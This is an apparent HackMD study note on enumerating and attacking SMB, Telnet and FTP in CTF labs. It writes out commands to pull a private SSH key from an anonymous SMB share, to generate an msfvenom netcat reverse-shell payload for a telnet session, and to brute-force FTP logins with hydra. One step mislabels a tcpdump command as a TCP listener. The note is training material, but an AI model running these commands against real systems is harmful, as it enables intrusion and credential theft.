Try   HackMD

Blue Team Training Series Part 1

tags: cybersecurity blue team smb telnet ftp hydra

Understanding SMB

Server Message Block protocol is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.

SMB is a request-response protocol meaning that it transmits multiple messages between the client and server to establish a connection.

Clients connect to servers using NETBIOS over TCP/IP(RFC 1001, and 1002), NetBEUI (netbios extended user interface) or IPX/SPX (internetwork packet exchange / sequenced packet exchange)

Once a connection is established, clients send commands (SMBs) to the server allowing them to access shares, open files, read and write files, or anything else you'd do with a file system.

Microsoft Windows >=95 have rolled out with support for SMB. Samba is the open source alternative for *nix systems

Enumerating SMB

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.

Enumeration is useful for gathering username, passwords, network info, host names, app data, services etc so long as it is useful to an attacker.

Typically there are SMB sharedrives on a server that can be connected to and used to view or transfer files.

Steps:

  1. Port Scanning : using nmap
  2. Enum4linux
    Tool used to enumerate SMB shares on both windows and linux systems. It is a wrapper around the tools in the samba package and makes it easy to quickly extract information from the target pertaining to smb.
    syntax: enum4linux [options] [ip]

Common shares include:

  • netlogon
  • profiles
  • print$
  • IPC$

At times the best way into a system is due to security misconfigurations in the system.
For SMB, that could be exploiting anonymous SMB share access, a common misconfiguration that could allow us to gain information that would lead to a shell.

From our enumeration stage we know:

  • The smb share location
  • The name of an interesting smb share

And the winner is smbclient

Because we are trying to access an SMB share, we need a client to access resources on a server. Let's use smbclient because it's part of the default samba suite.
syntax: smbclient //[IP]/[SHARE]
followed by the tags:
-U [name]: to specify the user (for anonymous use: Anonymous)
-p [port]: to specify the port (default is 445)

consider:

  • use the get command to download files while in smbclient
  • in the case of ssh, you can find the private key in the .ssh directory: it's usually named id_rsa
  • get id_rsa (downloads the key)
  • once you figure out the identity of the user e.g john doe
  • you can ssh into the system using:
  • ssh -i id_rsa johndoe@ip
  • then you go from there

Understanding Telnet

Telent is an application protocol allowing you through a telnet client to connect and issue commands to a remote machine hosting a telnet server.

The telnet client will establish a connection with the server.

The client then becomes a virtual terminal allowing you to interact with the remote host.

Since Telnet sends messages in clear text and doesn't have specific security mechanisms associated with it, ssh is used as its replacement.
syntax: telnet [ip] [port]

Vulnerabilities that could potentially be trivial to exploit do not always jump out at us. Therefore, we need to be thorough in our methodology.

You can check for telnet's CVEs at:
cvedetails.com
cve.mitre.org

A CVE (Common Vulnerabilities and Exposures) is a list of publicly disclosed computer security flaws.

Keep in mind, that you are far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow you to exploit it.

The name is shell.. Reverse shell

  • A shell is a piece of code / program that can be used to gain code execution or command execution on a device.
  • A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.
  • The attacking machine has a listening port on which it receives the connection, resulting in code or command execution being achieved.

listen and listen good with tcp

  • setup a tcp listener on your local machine with
  • syntax: tcpdump ip proto \icmp -i tun0 note that this is literally 'ip' and not an address
  • to see the output of the commands from the telnet session

Get that payday with that msfvenom payload

This will generate and encode a netcat reverse shell.
syntax: msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

  • -p : payload
  • lhost : our local host ip address
  • lport : the port to listen on
  • R : export the payload in raw format

start a netcat listener on our local machine
syntax: nc -lvp [listening port]

Once you're listening, copy and paste the payload into the telnet terminal and you have a reverse shell :-)

Understanding FTP

File Transfer Protocol is used to allow remote transfer of files over a network.
It utilises a client-server model to do this and relays data and commands in a very efficient way.
A typical Ftp session operates using two channels:

  • a command: sometimes called the control channel
  • a data channel

The command channel is for transmitting commands as well as replies to said commands.
The data channel is for transmitting data.

Ftp operates using a client-server protocol.
The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.
While the session is open, the client may execute commands on the server.

Servers support Active or passive connections or both

Active FTP: the client opens a port and listens. The server is required to actively connect to it.
Passive FTP: the server opens a port and listens passively and the client connects to it.

The separation of command and data channels allow for sending commands to the server without having to wait for data transfer to finish.

Exploiting anonymous ftp login to see what files we can access and if the info can lead to a shell is a common ctf method and mimics a real life careless implementation of an ftp server.

A common legacy exploit utilizing in.ftpd can be found here Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration

To check for anonymous ftp login:
syntax: ftp [ip] and enter anonymous and no password when prompted.

Exploiting FTP

When using FTP both the command and data channels are unecrypted.
Data sent over these channels can be intercepted and read.
You could use ARP-Poisoning to trick a victim into sending sensitive information to an attacker instead of a legitimate source. See related article here.

Enter HYDRA

Hydra is a very fast online password cracking tool which can perform rapid dictionary attacks against more than 50 protocols including telnet, rdp, ssh, ftp, http, smb, several dbs and more.

syntax:hydra -t 4 -l naruto -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp

  • hydra: runs hydra
  • -t 4: number of parallel connections per target
  • -l [user]: points to the user whose account you are trying to compromise
  • -P: [path to dictionary]: Points to the file containing the list of possible passwords
  • -vV: set verbose mode to very verbose
  • [machine ip]: the ip address of the target machine
  • ftp/protocol: sets the protocol

You can read more about exploitation of remote services here

Last changed by 
codeAssassin
As a code Assassin my focus is on Learning different ways to break code, and therefore, secure it. Interested in everything cyber security!
0
205

Read more

Jeeves - HTB Series

Windows Exploitation Walk through for Jeeves on Hack The Box

Sep 5, 2024
Windows Privilege Escalation

Fuzzy Security reference

Aug 26, 2024
Chatterbox - HTB Series

We start by scanning the target with nmap to find open ports

Aug 11, 2024
Active - HTB Series

image

Aug 10, 2024
Read more from codeAssassin
Published on HackMD